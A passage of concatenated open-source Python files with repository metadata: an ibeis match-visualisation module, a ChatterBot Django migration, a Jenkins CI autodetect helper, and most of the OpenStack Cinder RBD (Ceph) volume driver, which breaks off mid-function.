    # Idiom fix: ``subdir is not None`` instead of ``not subdir is None``.
    if subdir is not None:
        subdir = utool.sanitize_fname2(subdir)
        fpath = join(fpath, subdir)
        utool.ensurepath(fpath)
    df2.save_figure(fpath=fpath, usetitle=True)
    df2.reset()
def __dump_or_browse(ibs, subdir=None):
    """Show and/or save the current figure according to the BROWSE / DUMP flags."""
    if BROWSE:
        __browse()
    if DUMP:
        # BUG FIX: this previously called an undefined ``dump(ibs, subdir)``
        # (NameError whenever DUMP is True); the save helper in this module
        # is ``save_if_requested``.
        save_if_requested(ibs, subdir)
def plot_tt_bt_tf_matches(ibs, allres, qcx):
    """Plot the top-true, bottom-true, and top-false matches for one query."""
    #print('Visualizing result: ')
    #res.printme()
    res = allres.qcx2_res[qcx]
    # The *_qcx_arrays are indexed [0]=rank, [1]=score, [2]=chip index.
    ranks = (allres.top_true_qcx_arrays[0][qcx],
             allres.bot_true_qcx_arrays[0][qcx],
             allres.top_false_qcx_arrays[0][qcx])
    #scores = (allres.top_true_qcx_arrays[1][qcx],
    #allres.bot_true_qcx_arrays[1][qcx],
    #allres.top_false_qcx_arrays[1][qcx])
    cxs = (allres.top_true_qcx_arrays[2][qcx],
           allres.bot_true_qcx_arrays[2][qcx],
           allres.top_false_qcx_arrays[2][qcx])
    titles = ('best True rank=' + str(ranks[0]) + ' ',
              'worst True rank=' + str(ranks[1]) + ' ',
              'best False rank=' + str(ranks[2]) + ' ')
    # NOTE(review): pnum=231 here but 131/132/133 below -- confirm intended.
    df2.figure(fnum=1, pnum=231)
    res.plot_matches(res, ibs, cxs[0], False, fnum=1, pnum=131, title_aug=titles[0])
    res.plot_matches(res, ibs, cxs[1], False, fnum=1, pnum=132, title_aug=titles[1])
    res.plot_matches(res, ibs, cxs[2], False, fnum=1, pnum=133, title_aug=titles[2])
    fig_title = 'fig q' + ibs.cidstr(qcx) + ' TT BT TF -- ' + allres.title_suffix
    df2.set_figtitle(fig_title)
    #df2.set_figsize(_fn, 1200,675)
def dump_gt_matches(allres):
    """Displays the matches to ground truth for all queries"""
    # (Docstring moved to the top of the function; it previously sat after
    # two statements and was a no-op string literal.)
    ibs = allres.ibs
    qcx2_res = allres.qcx2_res
    for qcx in xrange(0, len(qcx2_res)):
        res = qcx2_res[qcx]
        res.show_gt_matches(ibs, fnum=FIGNUM)
    __dump_or_browse(allres.ibs, 'gt_matches' + allres.title_suffix)
def dump_orgres_matches(allres, orgres_type):
    """Dump side-by-side (raw / spatially verified) match figures.

    Iterates every (query, result, score, rank) tuple of the organized
    results named by ``orgres_type`` and renders both match variants.
    """
    orgres = allres.__dict__[orgres_type]
    ibs = allres.ibs
    qcx2_res = allres.qcx2_res
    # loop over each query / result of interest
    for qcx, cx, score, rank in orgres.iter():
        query_gname, _ = os.path.splitext(ibs.tables.gx2_gname[ibs.tables.cx2_gx[qcx]])
        result_gname, _ = os.path.splitext(ibs.tables.gx2_gname[ibs.tables.cx2_gx[cx]])
        res = qcx2_res[qcx]
        df2.figure(fnum=FIGNUM, pnum=121)
        # Left: raw matches (SV=False); right: spatially verified (SV=True).
        df2.show_matches3(res, ibs, cx, SV=False, fnum=FIGNUM, pnum=121)
        df2.show_matches3(res, ibs, cx, SV=True, fnum=FIGNUM, pnum=122)
        big_title = 'score=%.2f_rank=%d_q=%s_r=%s' % (score, rank, query_gname,
                                                      result_gname)
        df2.set_figtitle(big_title)
        __dump_or_browse(allres.ibs, orgres_type + '_matches' + allres.title_suffix)
@profile
def show_descriptors_match_distances(orgres2_distance, fnum=1, db_name='', **kwargs):
    """Grid of per-orgtype / per-disttype descriptor distance plots.

    Args:
        orgres2_distance: dict mapping orgtype -> {distkey -> distances}.
        fnum: matplotlib figure number.
        db_name: optional database name prefixed to the figure title.
        **kwargs: forwarded to the inner _distplot.

    NOTE(review): uses Python 2 dict iterators (itervalues/next); not py3-safe.
    """
    disttype_list = orgres2_distance.itervalues().next().keys()
    orgtype_list = orgres2_distance.keys()
    (nRow, nCol) = len(orgtype_list), len(disttype_list)
    nColors = nRow * nCol
    color_list = df2.distinct_colors(nColors)
    df2.figure(fnum=fnum, docla=True, doclf=True)
    pnum_ = lambda px: (nRow, nCol, px + 1)
    plot_type = utool.get_arg('--plot-type', default='plot')
    # Remember min and max val for each distance type (l1, emd...)
    # np.uint64(-1) is the max uint64 -- an "infinity" sentinel for min().
    distkey2_min = {distkey: np.uint64(-1) for distkey in disttype_list}
    distkey2_max = {distkey: 0 for distkey in disttype_list}
    def _distplot(dists, color, label, distkey, plot_type=plot_type):
        # Draw one distance distribution, as sorted values or as a pdf.
        data = sorted(dists)
        ax = df2.gca()
        min_ = distkey2_min[distkey]
        max_ = distkey2_max[distkey]
        if plot_type == 'plot':
            df2.plot(data, color=color, label=label, yscale='linear')
            #xticks = np.linspace(np.min(data), np.max(data), 3)
            #yticks = np.linspace(0, len(data), 5)
            #ax.set_xticks(xticks)
            #ax.set_yticks(yticks)
            ax.set_ylim(min_, max_)
            ax.set_xlim(0, len(dists))
            ax.set_ylabel('distance')
            ax.set_xlabel('matches indexes (sorted by distance)')
            df2.legend(loc='lower right')
        if plot_type == 'pdf':
            df2.plot_pdf(data, color=color, label=label)
            ax.set_ylabel('pr')
            ax.set_xlabel('distance')
            ax.set_xlim(min_, max_)
            df2.legend(loc='upper left')
        df2.dark_background(ax)
        df2.small_xticks(ax)
        df2.small_yticks(ax)
    px = 0
    # First pass: find the global min/max per distance type so all subplots
    # of the same distance share axis limits.
    for orgkey in orgtype_list:
        for distkey in disttype_list:
            dists = orgres2_distance[orgkey][distkey]
            if len(dists) == 0:
                continue
            min_ = dists.min()
            max_ = dists.max()
            distkey2_min[distkey] = min(distkey2_min[distkey], min_)
            distkey2_max[distkey] = max(distkey2_max[distkey], max_)
    # Second pass: draw one subplot per (orgtype, disttype) pair.
    for count, orgkey in enumerate(orgtype_list):
        for distkey in disttype_list:
            printDBG('[allres-viz] plotting: %r' % ((orgkey, distkey),))
            dists = orgres2_distance[orgkey][distkey]
            df2.figure(fnum=fnum, pnum=pnum_(px))
            color = color_list[px]
            title = distkey + ' ' + orgkey
            label = 'P(%s | %s)' % (distkey, orgkey)
            _distplot(dists, color, label, distkey, **kwargs)
            if count == 0:
                # Only the first row gets the column (distance type) title.
                ax = df2.gca()
                ax.set_title(distkey)
            px += 1
    subtitle = 'the matching distances between sift descriptors'
    title = '(sift) matching distances'
    if db_name != '':
        title = db_name + ' ' + title
    df2.set_figtitle(title, subtitle)
    df2.adjust_subplots_safe()
|
{
"content_hash": "5b3125e5ab52207aea964e4355f21f26",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 91,
"avg_line_length": 37.67634854771784,
"alnum_prop": 0.6105726872246696,
"repo_name": "SU-ECE-17-7/ibeis",
"id": "7f81317d0feba9a3d867246906bee6cf4aee0e7b",
"size": "9093",
"binary": false,
"copies": "1",
"ref": "refs/heads/next",
"path": "_broken/viz_allres.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "331"
},
{
"name": "CSS",
"bytes": "26792"
},
{
"name": "HTML",
"bytes": "33762203"
},
{
"name": "Inno Setup",
"bytes": "1585"
},
{
"name": "JavaScript",
"bytes": "227454"
},
{
"name": "Jupyter Notebook",
"bytes": "66346367"
},
{
"name": "Python",
"bytes": "6112508"
},
{
"name": "Shell",
"bytes": "58211"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Create the Conversation model and link statements to conversations.

    NOTE(review): applied migrations must not change behavior; this file is
    documented only.
    """
    dependencies = [
        ('django_chatterbot', '0005_statement_created_at'),
    ]
    operations = [
        migrations.CreateModel(
            name='Conversation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.AlterField(
            model_name='statement',
            name='created_at',
            field=models.DateTimeField(default=django.utils.timezone.now, help_text='The date and time that this statement was created at.'),
        ),
        migrations.AddField(
            model_name='conversation',
            name='statements',
            # NOTE(review): bytes help_text (b'...') is a Python 2 artifact;
            # harmless but inconsistent with the str help_text above.
            field=models.ManyToManyField(help_text=b'The statements in this conversation.', related_name='conversation', to='django_chatterbot.Statement'),
        ),
    ]
|
{
"content_hash": "45c2bd39349d54c64da8a1d947de7d57",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 155,
"avg_line_length": 33.645161290322584,
"alnum_prop": 0.6241610738255033,
"repo_name": "davizucon/ChatterBot",
"id": "f468701ea5e30c02996e77daf5a26875eef0422d",
"size": "1113",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "chatterbot/ext/django_chatterbot/migrations/0006_create_conversation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "336866"
}
],
"symlink_target": ""
}
|
import platform
import os
def autodetect():
    """Detect whether we are running inside a Jenkins CI environment.

    Logic: when the ``CI`` env var is present it must equal ``'true'`` and
    ``JENKINS_HOME`` must be set; when ``CI`` is absent we assume a match.

    Returns
    -------
    bool
        True if current platform matches, otherwise False
    """
    if 'CI' in os.environ:
        if os.environ['CI'] != 'true':
            return False
        # Inside CI: require a Jenkins environment specifically.
        if 'JENKINS_HOME' not in os.environ:
            return False
    return True
if __name__ == "__main__":
    # Manual check: report whether this platform is detected.
    print("Autodetect: {0}".format(autodetect()))
|
{
"content_hash": "b5d44697b07a852339f17a3f2eb6eec7",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 57,
"avg_line_length": 15.96,
"alnum_prop": 0.543859649122807,
"repo_name": "schreiberx/sweet",
"id": "5a185412fef37544d7ae50b061bad829176ad4ca",
"size": "399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mule/platforms/10_jenkins/JobPlatformAutodetect.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "133036"
},
{
"name": "C++",
"bytes": "2947985"
},
{
"name": "Fortran",
"bytes": "109460"
},
{
"name": "GLSL",
"bytes": "27428"
},
{
"name": "Makefile",
"bytes": "312"
},
{
"name": "Python",
"bytes": "2503502"
},
{
"name": "Shell",
"bytes": "490940"
},
{
"name": "TeX",
"bytes": "3093"
}
],
"symlink_target": ""
}
|
"""RADOS Block Device Driver"""
from __future__ import absolute_import
import io
import json
import os
import tempfile
import urllib
from oslo.config import cfg
from cinder import exception
from cinder.image import image_utils
from cinder.openstack.common import fileutils
from cinder.openstack.common import log as logging
from cinder import units
from cinder.volume import driver
try:
import rados
import rbd
except ImportError:
rados = None
rbd = None
LOG = logging.getLogger(__name__)
# Configuration options understood by the RBD driver; appended to the
# volume driver's configuration in RBDDriver.__init__.
rbd_opts = [
    cfg.StrOpt('rbd_pool',
               default='rbd',
               help='the RADOS pool in which rbd volumes are stored'),
    cfg.StrOpt('rbd_user',
               default=None,
               help='the RADOS client name for accessing rbd volumes '
                    '- only set when using cephx authentication'),
    cfg.StrOpt('rbd_ceph_conf',
               default='',  # default determined by librados
               help='path to the ceph configuration file to use'),
    cfg.BoolOpt('rbd_flatten_volume_from_snapshot',
                default=False,
                help='flatten volumes created from snapshots to remove '
                     'dependency'),
    cfg.StrOpt('rbd_secret_uuid',
               default=None,
               # BUG FIX: the two fragments below previously concatenated
               # to "rbd_uservolumes" -- a separating space was missing.
               help='the libvirt uuid of the secret for the rbd_user '
                    'volumes'),
    cfg.StrOpt('volume_tmp_dir',
               default=None,
               help='where to store temporary image files if the volume '
                    'driver does not write them directly to the volume'),
    cfg.IntOpt('rbd_max_clone_depth',
               default=5,
               help='maximum number of nested clones that can be taken of a '
                    'volume before enforcing a flatten prior to next clone. '
                    'A value of zero disables cloning')]
CONF = cfg.CONF
CONF.register_opts(rbd_opts)
def ascii_str(string):
    """Coerce *string* to a plain (ascii) str, passing None through.

    LibRBD only accepts ascii strings, so unicode values coming from
    configuration must be converted; a None default is preserved as-is.
    """
    return None if string is None else str(string)
class RBDImageMetadata(object):
    """Bundle of an rbd image handle plus its connection details.

    Instances are consumed by RBDImageIOWrapper, which needs the pool,
    user and ceph config path alongside the open image.
    """
    def __init__(self, image, pool, user, conf):
        self.image = image
        # librbd wants plain ascii strings, not unicode.
        self.pool, self.user, self.conf = str(pool), str(user), str(conf)
class RBDImageIOWrapper(io.RawIOBase):
    """Present a LibRBD.Image as a file-like Python IO object.

    Only the interfaces implemented below are supported; any other
    io.RawIOBase interface that is called will raise IOError.
    """
    def __init__(self, rbd_meta):
        super(RBDImageIOWrapper, self).__init__()
        self._rbd_meta = rbd_meta
        self._offset = 0

    def _inc_offset(self, length):
        # Advance the file position after a read/write of `length` bytes.
        self._offset += length

    @property
    def rbd_image(self):
        return self._rbd_meta.image

    @property
    def rbd_user(self):
        return self._rbd_meta.user

    @property
    def rbd_pool(self):
        return self._rbd_meta.pool

    @property
    def rbd_conf(self):
        return self._rbd_meta.conf

    def read(self, length=None):
        pos = self._offset
        total = self._rbd_meta.image.size()
        # NOTE(dosaboy): posix files do not barf if you read beyond their
        # length (they just return nothing) but rbd images do so we need to
        # return empty string if we have reached the end of the image.
        if pos >= total:
            return ''
        if length is None:
            length = total
        # Clamp the request to the remaining bytes in the image.
        length = min(length, total - pos)
        self._inc_offset(length)
        return self._rbd_meta.image.read(int(pos), int(length))

    def write(self, data):
        self._rbd_meta.image.write(data, self._offset)
        self._inc_offset(len(data))

    def seekable(self):
        return True

    def seek(self, offset, whence=0):
        # Resolve the base position the offset is relative to.
        if whence == 0:
            base = 0
        elif whence == 1:
            base = self._offset
        elif whence == 2:
            base = self._rbd_meta.image.size()
        else:
            raise IOError(_("Invalid argument - whence=%s not supported") %
                          (whence))
        new_offset = base + offset
        if new_offset < 0:
            raise IOError(_("Invalid argument"))
        self._offset = new_offset

    def tell(self):
        return self._offset

    def flush(self):
        # Older librbd builds do not expose flush(); degrade to a warning.
        try:
            self._rbd_meta.image.flush()
        except AttributeError:
            LOG.warning(_("flush() not supported in this version of librbd"))

    def fileno(self):
        """RBD has no file descriptor, so fileno() is unsupported.

        Raising IOError is recommended way to notify caller that interface is
        not supported - see http://docs.python.org/2/library/io.html#io.IOBase
        """
        raise IOError(_("fileno() not supported by RBD()"))

    # NOTE(dosaboy): if IO object is not closed explicitly, Python auto closes
    # it which, if this is not overridden, calls flush() prior to close which
    # in this case is unwanted since the rbd image may have been closed prior
    # to the autoclean - currently triggering a segfault in librbd.
    def close(self):
        pass
class RBDVolumeProxy(object):
    """Context manager for dealing with an existing rbd volume.

    This handles connecting to rados and opening an ioctx automatically, and
    otherwise acts like a librbd Image object.

    The underlying librados client and ioctx can be accessed as the attributes
    'client' and 'ioctx'.
    """
    def __init__(self, driver, name, pool=None, snapshot=None,
                 read_only=False):
        # Connect first; if opening the image then fails we must tear the
        # connection down again before re-raising (see except branch).
        client, ioctx = driver._connect_to_rados(pool)
        try:
            self.volume = driver.rbd.Image(ioctx, str(name),
                                           snapshot=ascii_str(snapshot),
                                           read_only=read_only)
        except driver.rbd.Error:
            LOG.exception(_("error opening rbd image %s"), name)
            # Don't leak the rados connection on failure.
            driver._disconnect_from_rados(client, ioctx)
            raise
        self.driver = driver
        self.client = client
        self.ioctx = ioctx
    def __enter__(self):
        return self
    def __exit__(self, type_, value, traceback):
        # Always disconnect, even if closing the image raises.
        try:
            self.volume.close()
        finally:
            self.driver._disconnect_from_rados(self.client, self.ioctx)
    def __getattr__(self, attrib):
        # Delegate everything else to the wrapped librbd Image.
        return getattr(self.volume, attrib)
class RADOSClient(object):
    """Context manager owning a rados connection for its lifetime.

    Connects on construction and guarantees disconnection on exit, which
    keeps error handling at call sites trivial.
    """
    def __init__(self, driver, pool=None):
        self.driver = driver
        self.cluster, self.ioctx = driver._connect_to_rados(pool)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        self.driver._disconnect_from_rados(self.cluster, self.ioctx)
class RBDDriver(driver.VolumeDriver):
    """Implements RADOS block device (RBD) volume commands."""
    VERSION = '1.1.0'
    def __init__(self, *args, **kwargs):
        """Initialize the driver and register RBD config options."""
        super(RBDDriver, self).__init__(*args, **kwargs)
        self.configuration.append_config_values(rbd_opts)
        self._stats = {}
        # allow overrides for testing
        self.rados = kwargs.get('rados', rados)
        self.rbd = kwargs.get('rbd', rbd)
    def check_for_setup_error(self):
        """Returns an error if prerequisites aren't met."""
        if rados is None:
            msg = _('rados and rbd python libraries not found')
            raise exception.VolumeBackendAPIException(data=msg)
        # Verify that we can actually connect to the configured cluster.
        try:
            with RADOSClient(self):
                pass
        except self.rados.Error:
            msg = _('error connecting to ceph cluster')
            LOG.exception(msg)
            raise exception.VolumeBackendAPIException(data=msg)
    def _ceph_args(self):
        """Build the CLI arguments (--id/--conf) matching this driver's
        rbd_user and rbd_ceph_conf configuration."""
        args = []
        if self.configuration.rbd_user:
            args.extend(['--id', self.configuration.rbd_user])
        if self.configuration.rbd_ceph_conf:
            args.extend(['--conf', self.configuration.rbd_ceph_conf])
        return args
    def _connect_to_rados(self, pool=None):
        """Connect to rados and open an ioctx on *pool* (or the configured
        default pool); returns a (client, ioctx) pair."""
        ascii_user = ascii_str(self.configuration.rbd_user)
        ascii_conf = ascii_str(self.configuration.rbd_ceph_conf)
        client = self.rados.Rados(rados_id=ascii_user, conffile=ascii_conf)
        try:
            client.connect()
            pool_to_open = str(pool or self.configuration.rbd_pool)
            ioctx = client.open_ioctx(pool_to_open)
            return client, ioctx
        except self.rados.Error:
            # shutdown cannot raise an exception
            client.shutdown()
            raise
    def _disconnect_from_rados(self, client, ioctx):
        """Tear down a (client, ioctx) pair produced by _connect_to_rados."""
        # closing an ioctx cannot raise an exception
        ioctx.close()
        client.shutdown()
    def _get_backup_snaps(self, rbd_image):
        """Get list of any backup snapshots that exist on this volume.

        There should only ever be one but accept all since they need to be
        deleted before the volume can be.
        """
        # NOTE(dosaboy): we do the import here otherwise we get import conflict
        # issues between the rbd driver and the ceph backup driver. These
        # issues only seem to occur when NOT using them together and are
        # triggered when the ceph backup driver imports the rbd volume driver.
        from cinder.backup.drivers import ceph
        return ceph.CephBackupDriver.get_backup_snaps(rbd_image)
    def _get_mon_addrs(self):
        """Return the cluster monitor addresses as ([hosts], [ports]),
        parsed from `ceph mon dump --format=json` output."""
        args = ['ceph', 'mon', 'dump', '--format=json']
        args.extend(self._ceph_args())
        # NOTE(review): this rebinding of `_` shadows the gettext builtin for
        # the rest of this method -- harmless here, but worth confirming.
        out, _ = self._execute(*args)
        lines = out.split('\n')
        # Some ceph versions prefix the JSON with a human-readable line.
        if lines[0].startswith('dumped monmap epoch'):
            lines = lines[1:]
        monmap = json.loads('\n'.join(lines))
        addrs = [mon['addr'] for mon in monmap['mons']]
        hosts = []
        ports = []
        for addr in addrs:
            # addr looks like "host:port/nonce"; strip the nonce, then split
            # host from port (IPv6 hosts are bracketed, hence strip('[]')).
            host_port = addr[:addr.rindex('/')]
            host, port = host_port.rsplit(':', 1)
            hosts.append(host.strip('[]'))
            ports.append(port)
        return hosts, ports
    def _update_volume_stats(self):
        """Refresh self._stats with current cluster capacity figures.
        Capacities fall back to 'unknown' if the cluster is unreachable."""
        stats = {
            'vendor_name': 'Open Source',
            'driver_version': self.VERSION,
            'storage_protocol': 'ceph',
            'total_capacity_gb': 'unknown',
            'free_capacity_gb': 'unknown',
            'reserved_percentage': 0,
        }
        backend_name = self.configuration.safe_get('volume_backend_name')
        stats['volume_backend_name'] = backend_name or 'RBD'
        try:
            with RADOSClient(self) as client:
                new_stats = client.cluster.get_cluster_stats()
            # Cluster stats are reported in kB; convert to GB.
            stats['total_capacity_gb'] = new_stats['kb'] / 1024 ** 2
            stats['free_capacity_gb'] = new_stats['kb_avail'] / 1024 ** 2
        except self.rados.Error:
            # just log and return unknown capacities
            LOG.exception(_('error refreshing volume stats'))
        self._stats = stats
    def get_volume_stats(self, refresh=False):
        """Return the current state of the volume service.

        If 'refresh' is True, run the update first.
        """
        if refresh:
            self._update_volume_stats()
        return self._stats
    def _supports_layering(self):
        """True if the installed librbd supports layered (COW) clones."""
        return hasattr(self.rbd, 'RBD_FEATURE_LAYERING')
    def _get_clone_depth(self, client, volume_name, depth=0):
        """Returns the number of ancestral clones (if any) of the given volume.
        """
        parent_volume = self.rbd.Image(client.ioctx, volume_name)
        try:
            pool, parent, snap = self._get_clone_info(parent_volume,
                                                      volume_name)
        finally:
            parent_volume.close()
        if not parent:
            return depth
        # If clone depth was reached, flatten should have occurred so if it has
        # been exceeded then something has gone wrong.
        if depth > CONF.rbd_max_clone_depth:
            raise Exception(_("clone depth exceeds limit of %s") %
                            (CONF.rbd_max_clone_depth))
        # Recurse up the ancestry chain.
        return self._get_clone_depth(client, parent, depth + 1)
    def create_cloned_volume(self, volume, src_vref):
        """Create a cloned volume from another volume.

        Since we are cloning from a volume and not a snapshot, we must first
        create a snapshot of the source volume.

        The user has the option to limit how long a volume's clone chain can be
        by setting rbd_max_clone_depth. If a clone is made of another clone
        and that clone has rbd_max_clone_depth clones behind it, the source
        volume will be flattened.
        """
        src_name = str(src_vref['name'])
        dest_name = str(volume['name'])
        flatten_parent = False
        # Do full copy if requested
        if CONF.rbd_max_clone_depth <= 0:
            with RBDVolumeProxy(self, src_name, read_only=True) as vol:
                vol.copy(vol.ioctx, dest_name)
            return
        # Otherwise do COW clone.
        with RADOSClient(self) as client:
            depth = self._get_clone_depth(client, src_name)
            # If source volume is a clone and rbd_max_clone_depth reached,
            # flatten the source before cloning. Zero rbd_max_clone_depth means
            # infinite is allowed.
            if depth == CONF.rbd_max_clone_depth:
                LOG.debug(_("maximum clone depth (%d) has been reached - "
                            "flattening source volume") %
                          (CONF.rbd_max_clone_depth))
                flatten_parent = True
            src_volume = self.rbd.Image(client.ioctx, src_name)
            try:
                # First flatten source volume if required.
                if flatten_parent:
                    pool, parent, snap = self._get_clone_info(src_volume,
                                                              src_name)
                    # Flatten source volume
                    LOG.debug(_("flattening source volume %s") % (src_name))
                    src_volume.flatten()
                    # Delete parent clone snap
                    parent_volume = self.rbd.Image(client.ioctx, parent)
                    try:
                        parent_volume.unprotect_snap(snap)
                        parent_volume.remove_snap(snap)
                    finally:
                        parent_volume.close()
                # Create new snapshot of source volume
                clone_snap = "%s.clone_snap" % dest_name
                LOG.debug(_("creating snapshot='%s'") % (clone_snap))
                src_volume.create_snap(clone_snap)
                src_volume.protect_snap(clone_snap)
            except Exception as exc:
                # Only close if exception since we still need it.
                src_volume.close()
                raise exc
            # Now clone source volume snapshot
            try:
                LOG.debug(_("cloning '%(src_vol)s@%(src_snap)s' to "
                            "'%(dest)s'") %
                          {'src_vol': src_name, 'src_snap': clone_snap,
                           'dest': dest_name})
                self.rbd.RBD().clone(client.ioctx, src_name, clone_snap,
                                     client.ioctx, dest_name,
                                     features=self.rbd.RBD_FEATURE_LAYERING)
            except Exception as exc:
                # Undo the snapshot we created above before propagating.
                src_volume.unprotect_snap(clone_snap)
                src_volume.remove_snap(clone_snap)
                raise exc
            finally:
                src_volume.close()
        LOG.debug(_("clone created successfully"))
    def create_volume(self, volume):
        """Creates a logical volume."""
        # A size of 0 gets a minimal 100 MiB image.
        if int(volume['size']) == 0:
            size = 100 * units.MiB
        else:
            size = int(volume['size']) * units.GiB
        LOG.debug(_("creating volume '%s'") % (volume['name']))
        # Use the new image format with layering when librbd supports it.
        old_format = True
        features = 0
        if self._supports_layering():
            old_format = False
            features = self.rbd.RBD_FEATURE_LAYERING
        with RADOSClient(self) as client:
            self.rbd.RBD().create(client.ioctx,
                                  str(volume['name']),
                                  size,
                                  old_format=old_format,
                                  features=features)
    def _flatten(self, pool, volume_name):
        """Flatten the named image so it no longer depends on its parent."""
        LOG.debug(_('flattening %(pool)s/%(img)s') %
                  dict(pool=pool, img=volume_name))
        with RBDVolumeProxy(self, volume_name, pool) as vol:
            vol.flatten()
    def _clone(self, volume, src_pool, src_image, src_snap):
        """COW-clone src_pool/src_image@src_snap into the configured pool
        under the new volume's name."""
        LOG.debug(_('cloning %(pool)s/%(img)s@%(snap)s to %(dst)s') %
                  dict(pool=src_pool, img=src_image, snap=src_snap,
                       dst=volume['name']))
        with RADOSClient(self, src_pool) as src_client:
            with RADOSClient(self) as dest_client:
                self.rbd.RBD().clone(src_client.ioctx,
                                     str(src_image),
                                     str(src_snap),
                                     dest_client.ioctx,
                                     str(volume['name']),
                                     features=self.rbd.RBD_FEATURE_LAYERING)
    def _resize(self, volume, **kwargs):
        """Resize the image to `size` bytes (default: the volume's
        nominal size in GiB)."""
        size = kwargs.get('size', None)
        if not size:
            size = int(volume['size']) * units.GiB
        with RBDVolumeProxy(self, volume['name']) as vol:
            vol.resize(size)
    def create_volume_from_snapshot(self, volume, snapshot):
        """Creates a volume from a snapshot."""
        self._clone(volume, self.configuration.rbd_pool,
                    snapshot['volume_name'], snapshot['name'])
        if self.configuration.rbd_flatten_volume_from_snapshot:
            self._flatten(self.configuration.rbd_pool, volume['name'])
        # Grow the clone if the new volume is larger than the snapshot.
        if int(volume['size']):
            self._resize(volume)
    def _delete_backup_snaps(self, client, volume_name):
        """Remove any backup snapshots from the named volume, if present."""
        rbd_image = self.rbd.Image(client.ioctx, volume_name)
        try:
            backup_snaps = self._get_backup_snaps(rbd_image)
            if backup_snaps:
                for snap in backup_snaps:
                    rbd_image.remove_snap(snap['name'])
            else:
                LOG.debug(_("volume has no backup snaps"))
        finally:
            rbd_image.close()
    def _get_clone_info(self, volume, volume_name, snap=None):
        """If volume is a clone, return its parent info.

        Returns a tuple of (pool, parent, snap). A snapshot may optionally be
        provided for the case where a cloned volume has been flattened but it's
        snapshot still depends on the parent.
        """
        try:
            snap and volume.set_snap(snap)
            pool, parent, parent_snap = tuple(volume.parent_info())
            snap and volume.set_snap(None)
            # Strip the tag off the end of the volume name since it will not be
            # in the snap name.
            if volume_name.endswith('.deleted'):
                volume_name = volume_name[:-len('.deleted')]
            # Now check the snap name matches.
            if parent_snap == "%s.clone_snap" % volume_name:
                return pool, parent, parent_snap
        except self.rbd.ImageNotFound:
            # parent_info() raises ImageNotFound when there is no parent.
            LOG.debug(_("volume %s is not a clone") % volume_name)
            volume.set_snap(None)
        return (None, None, None)
    def _delete_clone_parent_refs(self, client, parent_name, parent_snap):
        """Walk back up the clone chain and delete references.

        Deletes references i.e. deleted parent volumes and snapshots.
        """
        parent_rbd = self.rbd.Image(client.ioctx, parent_name)
        parent_has_snaps = False
        try:
            # Check for grandparent
            _pool, g_parent, g_parent_snap = self._get_clone_info(parent_rbd,
                                                                  parent_name,
                                                                  parent_snap)
            LOG.debug(_("deleting parent snapshot %s") % (parent_snap))
            parent_rbd.unprotect_snap(parent_snap)
            parent_rbd.remove_snap(parent_snap)
            parent_has_snaps = bool(list(parent_rbd.list_snaps()))
        finally:
            parent_rbd.close()
        # If parent has been deleted in Cinder, delete the silent reference and
        # keep walking up the chain if it is itself a clone.
        if (not parent_has_snaps) and parent_name.endswith('.deleted'):
            LOG.debug(_("deleting parent %s") % (parent_name))
            self.rbd.RBD().remove(client.ioctx, parent_name)
            # Now move up to grandparent if there is one
            if g_parent:
                self._delete_clone_parent_refs(client, g_parent, g_parent_snap)
    def delete_volume(self, volume):
        """Deletes a logical volume."""
        volume_name = str(volume['name'])
        with RADOSClient(self) as client:
            # Ensure any backup snapshots are deleted
            self._delete_backup_snaps(client, volume_name)
            # If the volume has non-clone snapshots this delete is expected to
            # raise VolumeIsBusy so do so straight away.
            rbd_image = self.rbd.Image(client.ioctx, volume_name)
            clone_snap = None
            parent = None
            try:
                snaps = rbd_image.list_snaps()
                for snap in snaps:
                    if snap['name'].endswith('.clone_snap'):
                        LOG.debug(_("volume has clone snapshot(s)"))
                        # We grab one of these and use it when fetching parent
                        # info in case this volume has been flattened.
                        clone_snap = snap['name']
                        break
                    raise exception.VolumeIsBusy(volume_name=volume_name)
                # Determine if this volume is itself a clone
                pool, parent, parent_snap = self._get_clone_info(rbd_image,
                                                                 volume_name,
                                                                 clone_snap)
            finally:
                rbd_image.close()
            if clone_snap is None:
                LOG.debug(_("deleting rbd volume %s") % (volume_name))
                self.rbd.RBD().remove(client.ioctx, volume_name)
                # If it is a clone, walk back up the parent chain deleting
                # references.
                if parent:
                    LOG.debug(_("volume is a clone so cleaning references"))
                    self._delete_clone_parent_refs(client, parent, parent_snap)
            else:
                # If the volume has copy-on-write clones we will not be able to
                # delete it. Instead we will keep it as a silent volume which
                # will be deleted when it's snapshot and clones are deleted.
                new_name = "%s.deleted" % (volume_name)
                self.rbd.RBD().rename(client.ioctx, volume_name, new_name)
    def create_snapshot(self, snapshot):
        """Creates an rbd snapshot."""
        with RBDVolumeProxy(self, snapshot['volume_name']) as volume:
            snap = str(snapshot['name'])
            volume.create_snap(snap)
            # Protect the snapshot so it can serve as a clone parent.
            if self._supports_layering():
                volume.protect_snap(snap)
    def delete_snapshot(self, snapshot):
        """Deletes an rbd snapshot."""
        with RBDVolumeProxy(self, snapshot['volume_name']) as volume:
            snap = str(snapshot['name'])
            if self._supports_layering():
                try:
                    volume.unprotect_snap(snap)
                except self.rbd.ImageBusy:
                    # Snapshot still has dependent clones.
                    raise exception.SnapshotIsBusy(snapshot_name=snap)
            volume.remove_snap(snap)
    def ensure_export(self, context, volume):
        """Synchronously recreates an export for a logical volume."""
        pass
    def create_export(self, context, volume):
        """Exports the volume."""
        pass
    def remove_export(self, context, volume):
        """Removes an export for a logical volume."""
        pass
    def initialize_connection(self, volume, connector):
        """Return the rbd connection info consumed by the rbd libvirt
        volume driver (monitor hosts/ports plus auth settings)."""
        hosts, ports = self._get_mon_addrs()
        data = {
            'driver_volume_type': 'rbd',
            'data': {
